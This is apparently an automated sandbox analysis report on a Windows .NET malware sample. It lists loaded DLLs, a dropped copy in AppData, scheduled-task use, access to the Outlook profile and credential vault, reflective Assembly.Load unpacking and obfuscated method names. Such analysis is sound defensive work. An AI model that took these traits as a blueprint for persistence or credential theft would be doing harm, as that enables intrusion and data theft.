                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: mscoree.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: version.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: uxtheme.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: windows.storage.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: wldp.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: profapi.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: cryptsp.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: rsaenh.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: cryptbase.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: wbemcomn.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: amsi.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: userenv.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: sspicli.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: vaultcli.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: wintypes.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: iphlpapi.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: dnsapi.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: dhcpcsvc.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: winnsi.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: mswsock.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: rasadhlp.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Section loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: dwrite.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: amsi.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: windowscodecs.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: propsys.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: edputil.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: netutils.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: slc.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: sppc.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: amsi.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: vaultcli.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Section loaded: fwpuclnt.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                        Source: Window Recorder | Window detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: LisectAVT_2403002A_16.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: LisectAVT_2403002A_16.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: LisectAVT_2403002A_16.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: FPzK.pdb source: LisectAVT_2403002A_16.exe, NxmtwwVGOtEdjd.exe.0.dr
                        Source: Binary string: FPzK.pdbSHA256 source: LisectAVT_2403002A_16.exe, NxmtwwVGOtEdjd.exe.0.dr

Data Obfuscation

Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, ioHoB3xyTTvGj5kpgh.cs | .Net Code: MWmr0l58sc System.Reflection.Assembly.Load(byte[])
Source: 0.2.LisectAVT_2403002A_16.exe.56e0000.6.raw.unpack, wehuuoKhMKMbnQu72K.cs | .Net Code: LOPk5OGwQvvejRfJl7n System.Reflection.Assembly.Load(byte[])
Source: 0.2.LisectAVT_2403002A_16.exe.2eb44ec.2.raw.unpack, wehuuoKhMKMbnQu72K.cs | .Net Code: LOPk5OGwQvvejRfJl7n System.Reflection.Assembly.Load(byte[])
Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, ioHoB3xyTTvGj5kpgh.cs | .Net Code: MWmr0l58sc System.Reflection.Assembly.Load(byte[])
Source: LisectAVT_2403002A_16.exe | Static PE information: 0xFEADA566 [Tue May 26 14:55:34 2105 UTC]
Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Code function: 0_2_01304779 push esi; iretd 0_2_0130477A
Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Code function: 0_2_0130477B push ebp; iretd 0_2_01304782
Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Code function: 0_2_013047B1 push esi; iretd 0_2_013047B2
Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Code function: 0_2_013046B8 push edx; iretd 0_2_013046BA
Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Code function: 0_2_013046BB push edx; iretd 0_2_013046C2
Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Code function: 0_2_0130AD27 pushfd ; iretd 0_2_0130AD2A
Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Code function: 0_2_0130AD2B pushfd ; iretd 0_2_0130AD32
Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Code function: 0_2_05A88248 pushad ; iretd 0_2_05A88251
Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Code function: 9_2_0668FCEF push ss; iretd 9_2_0668FCF0
Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Code function: 9_2_0668FCAF push ss; iretd 9_2_0668FCBD
Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Code function: 10_2_07952520 push dword ptr [esi+5D906B4Fh]; ret 10_2_07952573
Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Code function: 10_2_07958248 pushad ; iretd 10_2_07958251
Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Code function: 15_2_06308627 pushad ; iretd 15_2_06308635
Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Code function: 15_2_06305CA0 pushfd ; iretd 15_2_06305CAD
Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Code function: 15_2_06303D5F push es; ret 15_2_06303D70
Source: LisectAVT_2403002A_16.exe | Static PE information: section name: .text entropy: 7.613224313381159
Source: NxmtwwVGOtEdjd.exe.0.dr | Static PE information: section name: .text entropy: 7.613224313381159
Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, j9YWqGoNkeAufjqtfr.cs | High entropy of concatenated method names: 'SwVBC7ZCD1', 'jhUBUErGuT', 'bffBomOKCf', 'W4uBflm9Px', 'UEjBMaa25b', 'MPCBNmn75V', 'Ig1B9KdYih', 'OsrBLCjqaJ', 'wsXBRXOfsc', 'FleBgTAvaX'
Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, ioHoB3xyTTvGj5kpgh.cs | High entropy of concatenated method names: 'G9ndk8TnsG', 'jg3dZIJEHi', 'LjBdVa96e6', 'njPd8sy7Bo', 'kxQda3li6Z', 'ktdd2esIcl', 'JrRdebPBPP', 'a9edxPJqAd', 'Pfjd1MdnoS', 'CxUdIT8csT'
Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, WEkvyEiPg4exp1JWJr.cs | High entropy of concatenated method names: 'PZc8DdvK17', 'l9p87q38HQ', 'j5W8ExCVDC', 'gV68igLBCF', 'KsN8BH6Ooe', 'NcJ8QB2txh', 'iyL8s6pMM1', 'qVj8cTJkLf', 'g8086nvp58', 'krU8GwMf5Z'
Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, rbl15J4iXuiF3yd9Pd.cs | High entropy of concatenated method names: 'jOI63gVPXi', 'n296d5fH6H', 'Ul06rRK1yH', 'CMM6ZfhKG5', 'X5f6VZ7J6u', 'RES6aFvqWa', 'YxO621gL0n', 'evMcn1TQak', 'AhgcAtQIsF', 'WfYc5Ak4NU'
Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, Icw0P7E5I25dt8WiCY.cs | High entropy of concatenated method names: 'Gk3Vojd3xF', 'UpXVfsYioH', 'W48VHS9vLY', 'H5RVj2QvDd', 'rsNVSgaler', 'bw3VuusPrG', 'xqWVn6ipha', 'C8kVAN9vCL', 'ehcV5kxvk1', 'QXSV4KGidN'
Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, XwoIjq3XxNvPNWGVI52.cs | High entropy of concatenated method names: 'S9I6quAppn', 'JlE6PcGTqv', 'SpB60KOY5L', 'qjP6DTT0Do', 'xvT6FBq7tV', 'vsK67TUO69', 'KE46ykTPUU', 'xK26Ei4Otb', 'Jov6irQGiN', 'Aal6mlCDlR'
Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, OPdVgnRx7UCY8cpdFo.cs | High entropy of concatenated method names: 'TfZ2HWlAL0', 'CDH2jiyDlM', 'PsY2SKfM56', 'ToString', 'nRi2uMGmfV', 'mGS2ns9kQw', 'VW1wfe4cQXhE4QS8t0q', 'gIuVL14qtxlhqLcSKme', 'V9HCGv4MNGDARBt7yYF'
Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, iKYG0MmubIw9OVMBtg.cs | High entropy of concatenated method names: 'NfWaFrMeCy', 'ocvayym4Vb', 'Qxt8NPGEbw', 'bge89L9aFL', 'FrV8L75enC', 'nCK8RO97jH', 'y8H8gXfMji', 'cgq8l6SElR', 'KXV8wZV4Ij', 'J1J8CpPc5G'
Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, BAqoVNzExaAeveETi0.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nGt6KZD8kW', 'B2m6Bd1g5G', 'x5b6QwrK0C', 'l186sOqVHA', 'KWC6c28yta', 'S1x660KrN3', 'qx36G2ePrT'
Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, owyQps3JsOel92LKCfT.cs | High entropy of concatenated method names: 'yyPGquyU4J', 'HOBGPMb2R8', 'fbcG0exi88', 'm4Xi4D0WUGYwl2iwreo', 'PuZ1ee0GpkK7MHMmbUx', 'kDh9Ln0LiWLB6pRTekC', 'zlLPV70uhF5v6O9SMMp', 'MWOUVt0zq9CgoKTPbNF'
Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, lvrY9n9k7lkh9Cl70l.cs | High entropy of concatenated method names: 'dyU2vNq71H', 'bRk2qHAGtX', 'Qpn20Ie8IK', 'Dil2DQptVJ', 'y1k27iNsb5', 'imx2yTZCEx', 'CPt2ivNXMG', 'iO42m3uRWh', 'PlRYxG4EB672Ssut5jP', 's5Cqvv4dQVZ9udH5QQS'
Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, CrVdkuWHH6itGcKud7.cs | High entropy of concatenated method names: 'cs42ktJLwq', 'L0R2Vd9YmN', 'j2c2apgiGR', 'FVi2eCaI7X', 'F2X2x6jpsg', 'oSOaSIiBMG', 'lmtauUo0RN', 'fHFann456d', 'EG4aAj3BkZ', 'FVaa5gAE3p'
Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, TNI5rOjXvELxKJP6Fj.cs | High entropy of concatenated method names: 'CfksIuq50j', 'kvuspBFKxM', 'ToString', 'dR8sZa01jf', 'oBSsVBpPcp', 'EDos8Jm6MH', 'W6YsaP3s3U', 'lG5s2hT04B', 'FJ5seKuLH4', 'bJ9sxIrLJu'
Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, dMt11SJRe8APP9s2WL.cs | High entropy of concatenated method names: 'DfW0LGWf8', 'yl0DiW3Mk', 'XO87wDb8b', 'ljCyYh3ms', 'buqi4rcbN', 'ipvmXVMfp', 'TVQXYPh1C0sAYF3Uxd', 'UlSnaZ81YHSEFdtVni', 'pOZMDMIS6fcFdyJc9P', 'RA0cppkBm'
Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, QG7R5hgsvLbIepY6MR.cs | High entropy of concatenated method names: 'Qp9eZZB71w', 'sLGe8FrGFy', 'X5we2jcUuR', 'nDr24KU9Ms', 'itR2zuHXIZ', 'niXeXg3iOh', 'gk6e3O0EKL', 'iDleJWGD9X', 'OjiedqZRku', 'mGQeruVZC1'
Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, vVZlyfwE6D6VO1P3fu.cs | High entropy of concatenated method names: 'IS6eqWM1UO', 'aqqePdd4Ww', 'dQoe0qsNj8', 'ucbeDX7HC8', 'NcGeFZ58HE', 'SYRe7ktiZp', 'GRkey9vBMa', 'eMmeEgpjoi', 'gfueiotCx9', 'Rd3em2EVjB'
Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, yp7P2SryFTLLqPCLLF.cs | High entropy of concatenated method names: 'S393ecw0P7', 'YI23x5dt8W', 'EPg3I4exp1', 'cWJ3pr2KYG', 'gMB3Btg7rV', 'dku3QHH6it', 'Tga5uvB9jYMQHAFdI2', 'YHSRAKNCSCobJVmv0l', 'K1c331286p', 'zrj3dLrk18'
Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, WTyLNRuTreLPB4U01m.cs | High entropy of concatenated method names: 'CQMsApFQ0g', 'OGIs4PsFeP', 'QdAcXpX1b3', 'fPmc3asCCe', 'haUsTyBEYH', 'Y1DsUeR6fJ', 'XpssbgB0KU', 'yOSsoK7bGf', 'MMcsfgZliF', 'dC8sH0qY0s'
Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, NpB9h6VafMhAx1WsJp.cs | High entropy of concatenated method names: 'Dispose', 'AJi35vDi97', 'BTHJMf9HMs', 'tAuccFwjJ9', 'IHh34UJHEi', 'Hv53zFuv68', 'ProcessDialogKey', 'niWJXfxvCg', 'V7eJ31vJQV', 'AXCJJcbl15'
Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, ShUJHEAiMv5Fuv68Ki.cs | High entropy of concatenated method names: 'reicZxmOIa', 'mVrcVTteJu', 'qkxc8Byeb0', 'yDEca2XNs6', 'S2lc22ZKj2', 'uv5ceGNQjL', 'pwhcxLYg6y', 'VfLc1iJT7L', 'CkXcI4I5TX', 'DUdcpuyU5N'
Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, z2DRmH3drgXDZwPhdrF.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VciGoABM39', 'wm2GfLRJ7I', 'UqgGHbEgff', 'vfPGjQqj3q', 'uVRGS29YT5', 'HeOGu5CcVi', 'C0oGnAM5Qv'
Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, yWjIbkbFk9uQinWgPH.cs | High entropy of concatenated method names: 'PGbKEHongF', 'qe7KiRBmqH', 'PmCKW3fLEF', 'qaFKMKqOke', 'IddK9nSrCj', 'qPnKLVpZk7', 'mk2KgF0FaP', 'TyJKlLtkL3', 'XUwKCXwIjQ', 'F3GKThIsTt'
Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, GfxvCg5n7e1vJQVDXC.cs | High entropy of concatenated method names: 'B66cWq08vZ', 'PjOcMQSOoJ', 'HENcNl88o6', 'bKEc9YpV10', 'lgtcoGe4TI', 'UsNcLkoHPf', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.LisectAVT_2403002A_16.exe.56e0000.6.raw.unpack, kdFvaMFVPKs73pA7Ae.cs | High entropy of concatenated method names: 'jlLbsIppcp4pe', 'HUDVafGQx3A5lYPXEbC', 'bWxlDPGFKtjOUjq8ME9', 'J13JY7Gs9VegMR0Usdn', 'gjnvHYGCPTFBSN5sXDA', 'UXn9pRGVr5JYGFjuCRJ', 'g8bQ3yGYPoLwrRusK3E', 'KwwAwLG5jtFVjgr5V0l', 'lJyLiGG0wAjthymuVo5', 'KrHGd2G9wj507LdZGDe'
Source: 0.2.LisectAVT_2403002A_16.exe.56e0000.6.raw.unpack, DD.cs | High entropy of concatenated method names: 'wgRxinKHcbWANUbFNm', 'dwveif1E9jqp4XTbTA', 'iYTXHL2SDoNZBJVsGw', 'hFySdn3keDBvJSvKal', 'PVIytPpWpuEYQLk40u'
Source: 0.2.LisectAVT_2403002A_16.exe.56e0000.6.raw.unpack, ihWImL1h2qjtIkVYDh.cs | High entropy of concatenated method names: 'qJUttacKFT', 'djwp7oGHZ8xfNf3m5ut', 'AZqALCG67UykKuowXP2', 'dkLCJpGlCfFdqtD7Epf', 'iHWSkAGjDuGN31hXJsT', 'u4UYnDGE5xCOMnt15QR', 'jhES7Va4c', 'jWmROKkjL', 'Dispose', 'BJj7gBhfp'
Source: 0.2.LisectAVT_2403002A_16.exe.56e0000.6.raw.unpack, oImfMJtvGUo8fMQNBQ.cs | High entropy of concatenated method names: 'cxsORewNJ', 'VvrninWuk', 'ustvIxt9o', 'QtXoY7g0N', 'cMKlMbnQu', 'w2KLAB5Xx', 'hNkF6TG2YCh7xU8s3hJ', 'hs4l1PGKtLhAeRnm1c4', 'Dispose', 'MoveNext'
Source: 0.2.LisectAVT_2403002A_16.exe.56e0000.6.raw.unpack, wehuuoKhMKMbnQu72K.cs | High entropy of concatenated method names: 'NXMyxc8eI', 'GTZadPHeP', 'DEVNaDCj9', 'cflmBNqev', 'VFQ0OImLC', 'PbYVMxZvt', 'UPdFjbLed', 'AeEi93ui9', 'oM66buTLn', 'nxFUIfcfn'
